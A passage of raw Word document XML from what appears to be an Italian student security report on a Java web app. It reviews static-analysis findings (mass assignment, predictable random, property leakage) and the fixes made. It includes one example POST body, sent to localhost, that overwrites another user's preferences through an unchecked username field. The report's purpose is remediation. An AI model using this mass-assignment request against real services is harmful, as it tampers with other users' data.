        <w:t>È una vulnerabilità che nasce dalla man</w:t>
      </w:r>
      <w:r w:rsidR="00A31A32">
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>anza di controllo dei campi modificabili di un oggetto. In particolare, se si inseriscono campi che non dovrebbero essere modificati, un attaccante potrebbe modificarli in modo dannoso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B97D8E" w14:textId="77777777" w:rsidR="00350230" w:rsidRDefault="00350230" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C9EDA9" w14:textId="21F0F35F" w:rsidR="005D725F" w:rsidRDefault="00B508DA" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In questo </w:t>
      </w:r>
      <w:r w:rsidR="00350230">
        <w:t>esempio</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005D725F">
        <w:t xml:space="preserve"> l’unico campo che non viene modificato con l’oggetto Test è lo username</w:t>
      </w:r>
      <w:r w:rsidR="007424E1">
        <w:t>, di conseguenza si può utilizzare per modificare gli attributi di un altro user esistente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> se l’utente corrente è a conoscenza degli altri username salvati,</w:t>
      </w:r>
      <w:r w:rsidR="007424E1">
        <w:t xml:space="preserve"> cambiando il valore del parametro username. </w:t>
      </w:r>
      <w:r>
        <w:t>In questo caso quindi l’exploit è più difficile da fare ma comunque fattibile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11715B0B" w14:textId="77777777" w:rsidR="007424E1" w:rsidRDefault="007424E1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3423970B" w14:textId="200CA1A9" w:rsidR="007424E1" w:rsidRDefault="007424E1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00FC6739">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>http://localhost:8080/test</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="026B729D" w14:textId="2975530E" w:rsidR="007424E1" w:rsidRDefault="007424E1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">siamo loggati come username “user” ma siamo riusciti a fare una POST inserendo nel body questi campi: </w:t>
      </w:r>
      <w:r w:rsidRPr="007424E1">
        <w:t>{"username":"salvatore","categoryOne":"FUN","categoryTwo":"OTHER","categoryThree":"OTHER","categoryFour":"INTELLECTUAL","categoryFive":"ACTIVE","categorySix":"ACTIVE","categorySeven":"OTHER","location":"LUZERN"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBC041E" w14:textId="060E6C80" w:rsidR="007424E1" w:rsidRDefault="007424E1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">riuscendo quindi a inserire nel database questa entry in cui salviamo le preferenze dell’utente “salvatore”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A80590" w14:textId="480499E9" w:rsidR="00D97650" w:rsidRDefault="00D97650" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Classi coinvolte: TestController.java, TestServiceImpl.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211E2148" w14:textId="558F32F9" w:rsidR="007424E1" w:rsidRDefault="00C46E60" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7065FC49" wp14:editId="5D2682F5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>107950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6976110" cy="1488906"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17801882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6110" cy="1488906"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5222D244" w14:textId="78CFC395" w:rsidR="007424E1" w:rsidRDefault="007424E1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FDB78F8" w14:textId="6CB739D0" w:rsidR="007424E1" w:rsidRDefault="007424E1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19FF2549" w14:textId="52E96929" w:rsidR="007424E1" w:rsidRDefault="007424E1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68803F93" w14:textId="57453DF7" w:rsidR="00791AF1" w:rsidRDefault="00791AF1" w:rsidP="00350230"/>
    <w:p w14:paraId="616D63E8" w14:textId="16671ED9" w:rsidR="00791AF1" w:rsidRDefault="00C46E60" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1255CDC5" wp14:editId="080C6AD9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-785495</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5931239" cy="1778015"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3131901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239" cy="1778015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6544F942" w14:textId="77777777" w:rsidR="00C46E60" w:rsidRDefault="00C46E60" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="088D6CB2" w14:textId="77777777" w:rsidR="00C46E60" w:rsidRDefault="00C46E60" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D04D81D" w14:textId="77777777" w:rsidR="00791AF1" w:rsidRDefault="00791AF1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4213C32A" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="490827C3" w14:textId="7868A4CE" w:rsidR="00BF4ABA" w:rsidRPr="00BF4ABA" w:rsidRDefault="00F04F57" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fix: controllare che l’utente per cui si fanno le modifiche è lo stesso di quello autenticato, altrimenti si restituisce una </w:t>
      </w:r>
      <w:r w:rsidR="00747D31">
        <w:t>NOT_ACCEPTABLE</w:t>
      </w:r>
      <w:r w:rsidR="00B508DA">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A038F8" w14:textId="460BD8AC" w:rsidR="005B284B" w:rsidRPr="00F04F57" w:rsidRDefault="005B284B" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1483A1B4" wp14:editId="45C5399F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>63500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4867352" cy="1488263"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="69085505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352" cy="1488263"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC45E0F" w14:textId="4098EEBE" w:rsidR="00791AF1" w:rsidRDefault="00791AF1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB35B88" w14:textId="77777777" w:rsidR="00791AF1" w:rsidRDefault="00791AF1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C5ECC5" w14:textId="77777777" w:rsidR="00791AF1" w:rsidRDefault="00791AF1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6421A851" w14:textId="77777777" w:rsidR="00791AF1" w:rsidRDefault="00791AF1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781C9426" w14:textId="77777777" w:rsidR="00791AF1" w:rsidRDefault="00791AF1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08DB94CA" w14:textId="77777777" w:rsidR="00791AF1" w:rsidRDefault="00791AF1" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="658B7B00" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22883737" w14:textId="5ADCD7EB" w:rsidR="00BF4ABA" w:rsidRDefault="00BF4ABA" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Predictable Random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C303A3" w14:textId="3967431F" w:rsidR="00CE1B39" w:rsidRDefault="00CE1B39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>La vulnerabilità nasce quando i numeri casuali usati a scopi crittografici generati da un PRNG diventano predicibili, esponendo quindi informazioni sensibili agli attaccanti a causa della mancanza della randomicità. Si dovrebbero invece utilizzare i True Random Number Generator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B11809B" w14:textId="6DB09D2B" w:rsidR="00350230" w:rsidRDefault="00350230" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="769FF4AC" w14:textId="66BC009B" w:rsidR="00BF4ABA" w:rsidRDefault="00CE1B39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Nel nostro codice risulta un f</w:t>
      </w:r>
      <w:r w:rsidR="00BF4ABA">
        <w:t>also positivo poiché</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> il numero generato randomicamente </w:t>
      </w:r>
      <w:r w:rsidR="00BF4ABA">
        <w:t xml:space="preserve">viene usato solo per selezionare degli hobby in maniera </w:t>
      </w:r>
      <w:r>
        <w:t>casuale</w:t>
      </w:r>
      <w:r w:rsidR="00BF4ABA">
        <w:t xml:space="preserve"> e non ha a che fare con informazioni sensibili. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B99FFB1" w14:textId="5570205C" w:rsidR="003A418E" w:rsidRDefault="00370316" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B42FA2A" wp14:editId="49965265">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4792980" cy="4472305"/>
            <wp:effectExtent l="0" t="0" r="7620" b="4445"/>
            <wp:wrapNone/>
            <wp:docPr id="48228743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2980" cy="4472305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1298A" w14:textId="10573EE1" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3889E3D2" w14:textId="32A17E72" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A8E1B8B" w14:textId="786DB503" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CC933A4" w14:textId="01677B0B" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B73C36" w14:textId="547E0431" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DBA3D6B" w14:textId="26B25EAE" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A3EE46" w14:textId="4D65FCBE" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F923F2C" w14:textId="75D72E31" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11AD55A3" w14:textId="0DA00288" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F988553" w14:textId="004733EE" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781B7497" w14:textId="77777777" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5E218C" w14:textId="77777777" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB5ABA0" w14:textId="77777777" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="700DED72" w14:textId="77777777" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68B7BE14" w14:textId="77777777" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00C46E60"/>
    <w:p w14:paraId="6CEA8100" w14:textId="77777777" w:rsidR="006B3EEC" w:rsidRDefault="006B3EEC" w:rsidP="00C46E60"/>
    <w:p w14:paraId="70D14415" w14:textId="470EA88F" w:rsidR="003A418E" w:rsidRDefault="00553627" w:rsidP="003A418E">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Unexpected property leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE6BD70" w14:textId="1BD0130B" w:rsidR="00394934" w:rsidRDefault="00394934" w:rsidP="00CE3F28">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Questa vulnerabilità si ha quando vengono esposti dei dati sensibili degli oggetti all’esterno, mostrando informazioni non necessarie e violando la privacy.</w:t>
      </w:r>
      <w:r w:rsidR="00872EF7">
        <w:t xml:space="preserve"> Nel nostro caso alcuni sono risultati in dei falsi positivi e altri in veri positivi, elencati di seguito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01960B5A" w14:textId="26E3D8E4" w:rsidR="00553627" w:rsidRDefault="00CE3F28" w:rsidP="00CE3F28">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="004514D2">
        <w:t>n HobbyController è stato modificato il metodo getHobbyDetails() in modo tale da non restituire i campi dell’oggetto Hobby che non vengono utilizzati. Per fare ciò è stata introdotta la classe HobbyResponseDTO che è depurata dai campi inutilizzati, altrimenti potrebbero essere mandate in rete delle informazioni sensibili non necessarie.</w:t>
      </w:r>
      <w:r w:rsidR="00872EF7">
        <w:t xml:space="preserve"> In particolare</w:t>
      </w:r>
      <w:r w:rsidR="00370316">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00872EF7">
        <w:t xml:space="preserve"> sono stati rimossi i campi category, creator e location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09983103" w14:textId="7E351F14" w:rsidR="004514D2" w:rsidRPr="00553627" w:rsidRDefault="00872EF7" w:rsidP="004514D2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="105F3BA9" wp14:editId="7348690F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>91440</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7248128" cy="1625748"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="128352563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8128" cy="1625748"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2407DDC4" w14:textId="249834FA" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38421C67" w14:textId="5986184F" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="053A5CFD" w14:textId="77777777" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55FDBBF4" w14:textId="272FE7D5" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED62CB1" w14:textId="58D62D33" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08112798" w14:textId="361AA4B8" w:rsidR="003A418E" w:rsidRDefault="003A418E" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075A4DBA" w14:textId="53B9C673" w:rsidR="00093E39" w:rsidRDefault="00872EF7" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5EF57185" wp14:editId="18FF09EA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>228600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7025005" cy="1630680"/>
            <wp:effectExtent l="0" t="0" r="4445" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="18596977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5005" cy="1630680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F8DE8E" w14:textId="1A94BDC7" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560260BD" w14:textId="117BC178" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D774663" w14:textId="606442FD" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E42BA3B" w14:textId="2D6FFDBD" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3761B5AE" w14:textId="4E08E849" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72A42E57" w14:textId="56DCAC6A" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B81DDC5" w14:textId="5F11AA68" w:rsidR="00093E39" w:rsidRDefault="00093E39" w:rsidP="00BF4ABA">
      <w:pPr>
